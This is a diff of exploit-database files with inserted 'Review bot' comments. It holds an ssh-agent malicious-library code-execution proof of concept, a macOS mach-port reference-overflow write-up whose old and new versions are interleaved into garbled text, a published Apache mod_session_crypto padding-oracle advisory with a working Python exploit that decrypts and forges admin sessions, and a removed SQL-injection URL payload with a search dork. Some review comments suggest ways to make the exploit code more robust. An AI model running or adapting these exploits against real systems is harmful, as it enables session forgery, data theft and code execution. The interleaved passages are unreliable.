||||
__attribute__((constructor)) static void run(void) {
|
||||
// in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
|
||||
// prevent recursion through system()
|
||||
unsetenv("LD_PRELOAD");
|
||||
unsetenv("LD_LIBRARY_PATH");
|
||||
system("id > /tmp/test");
|
||||
}
|
||||
$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall
|
||||
|
||||
Connect to another machine using "ssh -A". Then, on the remote machine:
|
||||
|
||||
$ ssh-add -s [...]/evil_lib.so
|
||||
Enter passphrase for PKCS#11: [just press enter here]
|
||||
SSH_AGENT_FAILURE
|
||||
Could not add card: [...]/evil_lib.so
|
||||
|
||||
At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:
|
||||
|
||||
$ cat /tmp/test
|
||||
uid=1000(user) gid=1000(user) groups=[...]
|
||||
|
||||
|
||||
Fixed in http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/ssh-agent.c.diff?r1=1.214&r2=1.215&f=h
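Review bot: the reproduction steps never restate the precondition from the second paragraph, that the attacker-controlled library must already exist on the agent host's filesystem at the path passed to "ssh-add -s", so a reader following the steps alone may expect the remote path to be fetched; add that sentence before the ssh-add line. The file also documents only the fix commit, while the first paragraph already gives what an unpatched user can do: the add-smartcard-key commands are refused when the agent is locked, so locking the agent (ssh-add -x) or not forwarding it (-A) to hosts that are not fully trusted blocks this path; one line to that effect next to the "Fixed in" link would complete the advisory.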
|
|
@ -1,16 +1,153 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=930
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=926
|
||||
|
||||
IOUserClient subclasses which override IOUserClient::externalMethod need to ensure that if they return
|
||||
kIOReturnSuccess they actually take ownership of the mach_port_t asyncWakePort if they are called via
|
||||
IOConnectCallAsyncMethod.
|
||||
mach ports are really struct ipc_port_t's in the kernel; this is a reference-counted object,
|
||||
ip_reference and ip_release atomically increment and decrement the 32 bit io_references field.
|
||||
|
||||
If the userclient code doesn't take ownership of the mach port and returns a success code MIG assumes that
|
||||
they did take ownership and won't release it's reference on the port. This leads to a reference count leak.
|
||||
Unlike OSObjects, ip_reference will allow the reference count to overflow, however it is still 32-bits
|
||||
so without either a lot of physical memory (which you don't have on mobile or most desktops) or a real reference leak
|
||||
this isn't that interesting.
|
||||
|
||||
See the previous bug for more in-depth discussion.
|
||||
** MIG and mach message rights ownership **
|
||||
|
||||
This PoC targets IOSurface which was just the first userclient I looked at; I imagine more are vulnerable.
|
||||
This PoC takes about an hour on 4 core MacBookPro to trigger the kernel UaF.
|
||||
ipc_kobject_server in ipc_kobject.c is the main dispatch routine for the kernel MIG endpoints. When userspace sends a
|
||||
message the kernel will copy in the message body and also copy in all the message rights; see for example
|
||||
ipc_right_copyin in ipc_right.c. This means that by the time we reach the actual callout to the MIG handler any port rights
|
||||
contained in a request have had their reference count increased by one.
|
||||
|
||||
After the callout we reach the following code (still in ipc_kobject_server):
|
||||
|
||||
if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
|
||||
// The server function is responsible for the contents
|
||||
// of the message. The reply port right is moved
|
||||
// to the reply message, and we have deallocated
|
||||
// the destination port right, so we just need
|
||||
// to free the kmsg.
|
||||
ipc_kmsg_free(request);
|
||||
} else {
|
||||
// The message contents of the request are intact.
|
||||
// Destroy everthing except the reply port right,
|
||||
// which is needed in the reply message.
|
||||
request->ikm_header->msgh_local_port = MACH_PORT_NULL;
|
||||
ipc_kmsg_destroy(request);
|
||||
}
|
||||
|
||||
If the MIG callout returns success, then it means that the method took ownership of *all* of the rights contained in the message.
|
||||
If the MIG callout returns a failure code then the means the method took ownership of *none* of the rights contained in the message.
|
||||
|
||||
ipc_kmsg_free will only destroy the message header, so if the message had any other port rights then their reference counts won't be
|
||||
decremented. ipc_kmsg_destroy on the other hand will decrement the reference counts for all the port rights in the message, even those
|
||||
in port descriptors.
|
||||
|
||||
If we can find a MIG method which returns KERN_SUCCESS but doesn't in fact take ownership of any mach ports its passed (by for example
|
||||
storing them and dropping the ref later, or using them then immediately dropping the ref or passing them to another method which takes
|
||||
ownership) then this can lead to us being able to leak references.
|
||||
|
||||
** indirect MIG methods **
|
||||
|
||||
Here's the MIG request structure generated for io_service_add_notification_ool_64:
|
||||
|
||||
typedef struct {
|
||||
mach_msg_header_t Head;
|
||||
// start of the kernel processed data
|
||||
mach_msg_body_t msgh_body;
|
||||
mach_msg_ool_descriptor_t matching;
|
||||
mach_msg_port_descriptor_t wake_port;
|
||||
// end of the kernel processed data
|
||||
NDR_record_t NDR;
|
||||
mach_msg_type_number_t notification_typeOffset; // MiG doesn't use it
|
||||
mach_msg_type_number_t notification_typeCnt;
|
||||
char notification_type[128];
|
||||
mach_msg_type_number_t matchingCnt;
|
||||
mach_msg_type_number_t referenceCnt;
|
||||
io_user_reference_t reference[8];
|
||||
mach_msg_trailer_t trailer;
|
||||
} Request __attribute__((unused));
|
||||
|
||||
|
||||
This is an interesting method as its implementation actually calls another MIG handler:
|
||||
|
||||
|
||||
static kern_return_t internal_io_service_add_notification_ool(
|
||||
...
|
||||
kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t) matching );
|
||||
data = CAST_DOWN(vm_offset_t, map_data);
|
||||
|
||||
if( KERN_SUCCESS == kr) {
|
||||
// must return success after vm_map_copyout() succeeds
|
||||
// and mig will copy out objects on success
|
||||
*notification = 0;
|
||||
*result = internal_io_service_add_notification( master_port, notification_type,
|
||||
(char *) data, matchingCnt, wake_port, reference, referenceSize, client64, notification );
|
||||
vm_deallocate( kernel_map, data, matchingCnt );
|
||||
}
|
||||
|
||||
return( kr );
|
||||
}
|
||||
|
||||
|
||||
and internal_io_service_add_notification does this:
|
||||
|
||||
|
||||
static kern_return_t internal_io_service_add_notification(
|
||||
...
|
||||
if( master_port != master_device_port)
|
||||
return( kIOReturnNotPrivileged);
|
||||
|
||||
do {
|
||||
err = kIOReturnNoResources;
|
||||
|
||||
if( !(sym = OSSymbol::withCString( notification_type )))
|
||||
err = kIOReturnNoResources;
|
||||
|
||||
if (matching_size)
|
||||
{
|
||||
dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching, matching_size));
|
||||
}
|
||||
else
|
||||
{
|
||||
dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching));
|
||||
}
|
||||
|
||||
if (!dict) {
|
||||
err = kIOReturnBadArgument;
|
||||
continue;
|
||||
}
|
||||
...
|
||||
} while( false );
|
||||
|
||||
return( err );
|
||||
|
||||
|
||||
This inner function has many failure cases (wrong kernel port, invalid serialized data) which we can easily trigger and these error paths lead
|
||||
to this inner function not taking ownership of the wake_port argument. However, MIG will only see the return value of the outer internal_io_service_add_notification_ool
|
||||
which will always return success if we pass a valid ool memory descriptor. This violates ipc_kobject_server's ownership model where success means ownership
|
||||
was taken of all rights, not just some.
|
||||
|
||||
What this leads to is actually quite a nice primitive for constructing an ipc_port_t reference count overflow without leaking any memory.
|
||||
|
||||
If we call io_service_add_notification_ool with a valid ool descriptor, but fill it with data that causes OSUnserializeXML to return an error then
|
||||
we can get that memory freed (via the vm_deallocate call above) but the reference on the wake port will be leaked since ipc_kmsg_free will be called, not
|
||||
ipc_kmsg_destroy.
|
||||
|
||||
If we send this request 0xffffffff times we can cause a ipc_port_t's io_references field to overflow to 0; the next time it's used the ref will go 0 -> 1 -> 0
|
||||
and the object will be free'd but we'll still have a dangling pointer in our process's ports table.
|
||||
|
||||
As well as being a regular kernel UaF this also gives us the opportunity to do all kinds of fun mach port related logic attacks, eg getting send rights to
|
||||
other task's task ports via our dangling ipc_port_t pointer.
|
||||
|
||||
** practicality **
|
||||
|
||||
On my 4 year old dual core MBA 5,2 running with two threads this PoC takes around 8 hours after which you should see a kernel panic indicative of a UaF.
|
||||
Note that there are no resources leaks involved here so you can run it even on very constrained systems like an iPhone and it will work fine,
|
||||
albeit a bit slowly :)
|
||||
|
||||
This code is reachable from all sandboxed environments.
|
||||
|
||||
** fixes **
|
||||
|
||||
One approach to fixing this issue would be to do something similar to OSObjects which use a saturating reference count and leak the object if the reference count saturates
|
||||
|
||||
I fear there are a great number of similar issues so just fixing this once instance may not be enough.
|
||||
|
||||
|
||||
Proof of Concept:
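Review bot: the Source line changes from Project Zero issue 930 to issue 926 and the body that goes with it changes to a different bug (the lines that interleave with the new text, namely the IOUserClient::externalMethod/asyncWakePort summary, "See the previous bug", the IOSurface PoC and "about an hour on 4 core MacBookPro", read as the removed 16-line version, while the added text covers io_service_add_notification_ool and an 8-hour run on a dual-core MBA), so this is a wholesale content swap rather than an edit of the same write-up; confirm that the exploit ID this file belongs to is meant to point at issue 926 and that the issue 930 text is not lost. The added text also ends at "Proof of Concept:" with no link or code after it in the visible lines, so either the PoC reference is missing or the heading should be removed.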
|
||||
|
|
376
platforms/multiple/webapps/40961.py
Executable file
|
@ -0,0 +1,376 @@
|
|||
'''
|
||||
Advisory: Padding Oracle in Apache mod_session_crypto
|
||||
|
||||
During a penetration test, RedTeam Pentesting discovered a Padding
|
||||
Oracle vulnerability in mod_session_crypto of the Apache web server.
|
||||
This vulnerability can be exploited to decrypt the session data and even
|
||||
encrypt attacker-specified data.
|
||||
|
||||
|
||||
Details
|
||||
=======
|
||||
|
||||
Product: Apache HTTP Server mod_session_crypto
|
||||
Affected Versions: 2.3 to 2.5
|
||||
Fixed Versions: 2.4.25
|
||||
Vulnerability Type: Padding Oracle
|
||||
Security Risk: high
|
||||
Vendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html
|
||||
Vendor Status: fixed version released
|
||||
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt
|
||||
Advisory Status: published
|
||||
CVE: CVE-2016-0736
|
||||
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736
|
||||
|
||||
|
||||
Introduction
|
||||
============
|
||||
|
||||
The module mod_session_crypto of the Apache HTTP Server can be used in
|
||||
conjunction with the modules mod_session and mod_session_cookie to store
|
||||
session data in an encrypted cookie within the users' browsers. This
|
||||
avoids server-side session state so that incoming HTTP requests can be
|
||||
easily distributed amongst a number of application web servers which do
|
||||
not need to share session state.
|
||||
|
||||
|
||||
More Details
|
||||
============
|
||||
|
||||
The module mod_session_crypto uses symmetric cryptography to encrypt and
|
||||
decrypt session data and uses mod_session to store the encrypted data in
|
||||
a cookie (usually called "session") within the user's browser. The
|
||||
decrypted session is then made available to the application in an
|
||||
environment variable (in case of a CGI script) or in a custom HTTP
|
||||
request header. The application can add a custom HTTP response header
|
||||
(usually "X-Replace-Session") which instructs the HTTP server to replace
|
||||
the session's content with the value of the header. Detailed
|
||||
instructions to set up mod_session and mod_session_crypto can be found
|
||||
in the documentation:
|
||||
https://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples
|
||||
|
||||
The module mod_session_crypto is configured to use either 3DES or AES
|
||||
with various key sizes, defaulting to AES256. Encryption is handled by
|
||||
the function "encrypt_string":
|
||||
|
||||
modules/session/mod_session_crypto.c
|
||||
------------------------------------------------------------------------
|
||||
/**
|
||||
* Encrypt the string given as per the current config.
|
||||
*
|
||||
* Returns APR_SUCCESS if successful.
|
||||
*/
|
||||
static apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,
|
||||
session_crypto_dir_conf *dconf, const char *in, char **out)
|
||||
{
|
||||
[...]
|
||||
apr_crypto_key_t *key = NULL;
|
||||
[...]
|
||||
const unsigned char *iv = NULL;
|
||||
[...]
|
||||
|
||||
/* use a uuid as a salt value, and prepend it to our result */
|
||||
apr_uuid_get(&salt);
|
||||
|
||||
[...]
|
||||
|
||||
res = apr_crypto_passphrase(&key, &ivSize, passphrase,
|
||||
strlen(passphrase),
|
||||
(unsigned char *) (&salt), sizeof(apr_uuid_t),
|
||||
*cipher, APR_MODE_CBC, 1, 4096, f, r->pool);
|
||||
|
||||
[...]
|
||||
|
||||
res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);
|
||||
[...]
|
||||
res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,
|
||||
strlen(in), block);
|
||||
[...]
|
||||
res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);
|
||||
[...]
|
||||
|
||||
/* prepend the salt and the iv to the result */
|
||||
combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));
|
||||
memcpy(combined, &salt, sizeof(apr_uuid_t));
|
||||
memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);
|
||||
memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);
|
||||
|
||||
/* base64 encode the result */
|
||||
base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +
|
||||
sizeof(apr_uuid_t) + 1)
|
||||
* sizeof(char));
|
||||
[...]
|
||||
return res;
|
||||
}
|
||||
------------------------------------------------------------------------
|
||||
|
||||
The source code shows that an encryption key is derived from the
configured password and a randomly chosen salt by calling the function
"apr_crypto_passphrase". This function internally uses PBKDF2 to derive
the key. The data is then encrypted and the salt and IV prepended to the
encrypted data. Before returning to the caller, the result is encoded as
base64.

This procedure does not guarantee integrity of the ciphertext, so the
Apache module is unable to detect whether a session sent back to the
server has been tampered with. Depending on the application this often
means that attackers are able to exploit a Padding Oracle vulnerability.
This allows decrypting the session and encrypting arbitrary data chosen
by the attacker.


Proof of Concept
================

The vulnerability can be reproduced as follows. First, the modules
mod_session, mod_session_crypto and mod_session_cookie are enabled and
configured:

------------------------------------------------------------------------
Session On
SessionEnv On
SessionCookieName session path=/
SessionHeader X-Replace-Session
SessionCryptoPassphrase RedTeam
------------------------------------------------------------------------

In addition, CGI scripts are enabled for a folder and the following CGI
script is saved as "status.rb" and is made available to clients:

------------------------------------------------------------------------
#!/usr/bin/env ruby

require 'cgi'

cgi = CGI.new
data = CGI.parse(ENV['HTTP_SESSION'])

if data.has_key? 'username'
  puts
  puts "your username is %s" % data['username']
  exit
end

puts "X-Replace-Session: username=guest&timestamp=" + Time.now.strftime("%s")
puts
puts "not logged in"
------------------------------------------------------------------------

Once the CGI script is correctly set up, the command-line HTTP client curl
can be used to access it:

------------------------------------------------------------------------
$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb
HTTP/1.1 200 OK
Date: Tue, 19 Jan 2016 13:23:19 GMT
Server: Apache/2.4.10 (Ubuntu)
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
Cache-Control: no-cache
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
Transfer-Encoding: chunked
Content-Type: application/x-ruby

not logged in
------------------------------------------------------------------------

The example shows that a new encrypted cookie with the name "session" is
returned, and the response body contains the text "not logged in".
Calling the script again with the cookie just returned reveals that the
username in the session is set to "guest":

------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \
http://127.0.0.1:8080/cgi-bin/status.rb

your username is guest
------------------------------------------------------------------------

Sending a modified cookie ending in "u=" instead of "U=" will invalidate
the padding at the end of the ciphertext, so the session cannot be
decrypted correctly and is therefore not passed to the CGI script, which
returns the text "not logged in" again:

------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \
http://127.0.0.1:8080/cgi-bin/status.rb

not logged in
------------------------------------------------------------------------

This verifies the existence of the Padding Oracle vulnerability. The
Python library[1] python-paddingoracle was then used to implement
decrypting the session by exploiting the Padding Oracle vulnerability.

exploit.py
------------------------------------------------------------------------
'''

from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
import requests

class PadBuster(PaddingOracle):
    def __init__(self, valid_cookie, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.wait = kwargs.get('wait', 2.0)
        self.valid_cookie = valid_cookie

    def oracle(self, data, **kwargs):
        v = b64encode(self.valid_cookie+data)

        response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',
                cookies=dict(session=v), stream=False, timeout=5, verify=False)

        if 'username' in response.content:
            logging.debug('No padding exception raised on %r', v)
            return

        raise BadPaddingException

if __name__ == '__main__':
    import logging
    import sys

    if not sys.argv[2:]:
        print 'Usage: [encrypt|decrypt] <session value> <plaintext>'
        sys.exit(1)

    logging.basicConfig(level=logging.WARN)
    mode = sys.argv[1]
    session = b64decode(sys.argv[2])
    padbuster = PadBuster(session)

    if mode == "decrypt":
        cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])
        print('Decrypted session:\n%r' % cookie)
    elif mode == "encrypt":
        key = session[0:16]
        plaintext = sys.argv[3]

        s = padbuster.encrypt(plaintext, block_size=16)

        data = b64encode(key+s[0:len(s)-16])
        print('Encrypted session:\n%s' % data)
    else:
        print "invalid mode"
        sys.exit(1)

'''
------------------------------------------------------------------------

This Python script can then be used to decrypt the session:

------------------------------------------------------------------------
$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=
Decrypted session:
b'username=guest&timestamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r'

real 6m43.088s
user 0m15.464s
sys 0m0.976s
------------------------------------------------------------------------

In this sample application, the username and a timestamp are included in
the session data. The Python script can also be used to encrypt a new
session containing the username "admin":

------------------------------------------------------------------------
$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\
RU= username=admin

Encrypted session:
sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY

real 3m38.002s
users 0m8.536s
sys 0m0.512s

------------------------------------------------------------------------

Sending this newly encrypted session to the server shows that the
username is now "admin":

------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\
zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb

your username is admin
------------------------------------------------------------------------


Workaround
==========

Use a different means to store the session, e.g. in a database by using
mod_session_dbd.


Fix
===

Update to Apache HTTP version 2.4.25 (see [2]).


Security Risk
=============

Applications which use mod_session_crypto usually store sensitive values
in the session and rely on an attacker's inability to decrypt or modify
the session. Successful exploitation of the Padding Oracle vulnerability
subverts this mechanism and allows to construct sessions with arbitrary
attacker-specified content. Depending on the application this may
completely subvert the application's security. Therefore, this
vulnerability poses a high risk.


Timeline
========

2016-01-11 Vulnerability identified
2016-01-12 Customer approved disclosure to vendor
2016-01-12 CVE number requested
2016-01-20 Vendor notified
2016-01-22 Vendor confirmed the vulnerability
2016-02-03 Vendor provided patch
2016-02-04 Apache Security Team assigned CVE number
2016-03-03 Requested status update from vendor, no response
2016-05-02 Requested status update from vendor, no response
2016-07-14 Requested status update and roadmap from vendor
2016-07-21 Vendor confirms working on a new released and inquired whether the
           patch fixes the vulnerability
2016-07-22 RedTeam confirms
2016-08-24 Requested status update from vendor
2016-08-29 Vendor states that there is no concrete timeline
2016-12-05 Vendor announces a release
2016-12-20 Vendor released fixed version
2016-12-23 Advisory released


References
==========

[1] https://github.com/mwielgoszewski/python-paddingoracle
[2] http://httpd.apache.org/security/vulnerabilities_24.html


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
'''

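Review bot: in the embedded exploit.py, `oracle()` calls `logging.debug(...)` but `logging` is only imported inside the `if __name__ == '__main__':` block, so the `PadBuster` class raises NameError on its first successful oracle round-trip whenever the module is imported instead of run as a script; move `import logging` up beside `import requests` so the class is usable on its own. The `wait` keyword read in `__init__` is also passed through to `PaddingOracle.__init__` via `**kwargs` before being stored, which is fine only if the base class accepts it; a one-line comment saying which python-paddingoracle version this was written against would make that dependency explicit.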
@ -1,28 +0,0 @@
|
|||
|___________________________________________________|
|
||||
|
|
||||
| Link Trader (lnkid) Remote SQL Injection Vulnerability
|
||||
|
|
||||
|___________________________________________________
|
||||
|---------------------Hussin X----------------------|
|
||||
|
|
||||
| Author: Hussin X
|
||||
|
|
||||
| Home : www.iq-ty.com<http://www.iq-ty.com>
|
||||
|
|
||||
| email: darkangel_g85[at]Yahoo[DoT]com
|
||||
|
|
||||
|
|
||||
|___________________________________________________
|
||||
| |
|
||||
|
|
||||
| script : http://www.ezonescripts.com/scripts/sls/linktrader.php
|
||||
|
|
||||
| DorK : inurl:ratelink.php?lnkid=
|
||||
|___________________________________________________|
|
||||
|
||||
Exploit:
|
||||
|
||||
|
||||
|
||||
www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*
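Review bot: this hunk deletes the entire Link Trader 'lnkid' entry (-1,28 +0,0) with no replacement in the same file, so the only record of the affected script (http://www.ezonescripts.com/scripts/sls/linktrader.php) and its `ratelink.php?lnkid=` parameter leaves the tree; if the entry is being retired as a duplicate or re-filed under a new title, say so in the commit message so the exploit index and the removed file remain reconcilable.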